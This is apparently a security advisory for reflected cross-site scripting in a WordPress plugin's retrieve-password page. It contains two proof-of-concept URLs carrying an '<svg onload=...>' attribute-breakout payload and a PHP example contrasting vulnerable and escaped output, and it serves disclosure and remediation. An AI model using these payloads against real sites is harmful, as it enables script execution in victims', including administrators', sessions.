The plugin does not sanitise or escape the reset_key and user_id parameters before outputting them back inside HTML attributes on the retrieve-password page, leading to Reflected Cross-Site Scripting. A payload such as `"><svg onload=prompt(/XSS/)>` closes the attribute value and the enclosing tag and injects a new element, so an attacker who gets a victim to open a crafted link can run JavaScript in the victim's session; this could be used against high-privilege users such as an admin. Both PoC URLs below use a throwaway value for the other parameter, so exploitation does not appear to require a valid reset key.
https://example.com/dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(/XSS/)%3E&user_id=dd
https://example.com/dashboard/retrieve-password/?reset_key=a&user_id=%22%3E%3Csvg%20onload=prompt(/XSS/)%3E
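The following is an added example, not the plugin's own code: the function names, the hidden-input markup and the inline `esc_attr()` stand-in are assumptions made so the snippet runs outside WordPress. It shows the vulnerable pattern (query parameters concatenated into attribute values) next to the fixed pattern (escaping for the attribute context at the point of output), fed with the decoded `reset_key` payload from the first PoC URL.

```php
<?php
// Added example, not code from the affected plugin. Function names and the
// markup are assumptions; the real plugin's form rendering is not shown here.

// Stand-in for WordPress's esc_attr() so the file runs without WordPress.
// Inside WordPress the real esc_attr() is available and should be used; this
// approximation covers the attribute-breakout case demonstrated below.
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable pattern: untrusted GET parameters echoed straight into
// double-quoted attribute values. A value containing "> terminates the
// attribute and the <input> tag, and whatever follows becomes new markup.
function render_reset_form_vulnerable(array $get): string {
    $reset_key = $get['reset_key'] ?? '';
    $user_id   = $get['user_id'] ?? '';
    return '<input type="hidden" name="reset_key" value="' . $reset_key . '">'
         . '<input type="hidden" name="user_id" value="' . $user_id . '">';
}

// Fixed pattern: escape for the HTML attribute context at the point of output.
// Quotes, angle brackets and ampersands become entities, so the browser keeps
// the whole value inside the attribute instead of parsing it as a tag.
function render_reset_form_fixed(array $get): string {
    $reset_key = esc_attr($get['reset_key'] ?? '');
    $user_id   = esc_attr($get['user_id'] ?? '');
    return '<input type="hidden" name="reset_key" value="' . $reset_key . '">'
         . '<input type="hidden" name="user_id" value="' . $user_id . '">';
}

// Quick check usable in a unit test: does the rendered markup contain an
// <svg element outside of an attribute value?
function contains_injected_tag(string $html): bool {
    return strpos($html, '<svg') !== false;
}

// Constructed request: the URL-decoded form of the first PoC
// (reset_key=%22%3E%3Csvg%20onload=prompt(/XSS/)%3E&user_id=dd).
$get = [
    'reset_key' => '"><svg onload=prompt(/XSS/)>',
    'user_id'   => 'dd',
];

$vulnerable = render_reset_form_vulnerable($get);
$fixed      = render_reset_form_fixed($get);

echo "Vulnerable output:\n", $vulnerable, "\n\n";
echo "Fixed output:\n", $fixed, "\n\n";

// The vulnerable rendering contains a live <svg onload=...> element; the fixed
// rendering keeps the payload inert as &quot;&gt;&lt;svg ...&gt; inside value="".
var_dump(contains_injected_tag($vulnerable)); // bool(true)
var_dump(contains_injected_tag($fixed));      // bool(false)
```

In a WordPress plugin the fix is to wrap each reflected parameter in `esc_attr()` (or `esc_url()` when the attribute is a URL) wherever it is printed into markup, regardless of any sanitisation applied on input; escaping must match the output context, so `esc_html()` would be the right call for text between tags but not for attribute values.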